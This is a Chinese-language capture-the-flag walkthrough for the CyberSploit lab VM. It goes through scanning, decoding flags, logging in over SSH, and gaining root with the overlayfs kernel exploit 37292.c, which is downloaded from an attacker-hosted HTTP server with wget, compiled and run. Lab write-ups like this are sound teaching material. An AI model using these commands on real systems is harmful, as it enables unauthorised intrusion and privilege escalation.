cybersploit

发布时间:2022-07-04 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了cybersploit脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

靶机准备

将ova文件导入虚拟机中,设置网络模式为NAT 从靶机描述得知包含3个flag

cybersploit

cybersploit

Kali扫描其ip

netdiscover -r 192.168.164.0/24

cybersploit

渗透测试

namp扫描端口

nmap -sS -sV -t5 -A -p- 192.168.164.187

cybersploit

只开放了22、80端口 访问80端口

cybersploit

查看码,发现信息

cybersploit

扫描一下目录

dirb http://192.168.164.187

cybersploit

发现robots.txt,访问

cybersploit

得到一串密文,尝试base64解码 成功获得flag1

@H_360_50@

接下来尝试ssh连接 利用刚才获得的username进行尝试猜测密码为flag1: cybersploIT{youtube.COM/c/cybersploit} 成功登录

cybersploit

不是root权限

cybersploit

查看一下目录,发现flag2,读取

cybersploit

得到一串二进制数据,可能有用

01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101

使用工具将二进制转文本,获得flag2

cybersploit

提权

先查看系统内核版本

uname -a

cybersploit

是3.13.0-32-generic 查找是否有漏洞

seArchsploit overlayfs

cybersploit

下载37292.c文件

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root

cybersploit

在kali开启http服务,靶机下载此文件。

python -m SimpleHTTPServer 8080
靶机:wget http://192.168.164.137:8080/37292.c

cybersploit

gcc编译命令:

gcc 37292.c -o test

cybersploit

执行脚本文件:

./test

提权成功,得到root权限!!!

cybersploit

进入root目录拿到最后一个flag3

cybersploit

脚本宝典总结

以上是脚本宝典为你收集整理的cybersploit全部内容,希望文章能够帮你解决cybersploit所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。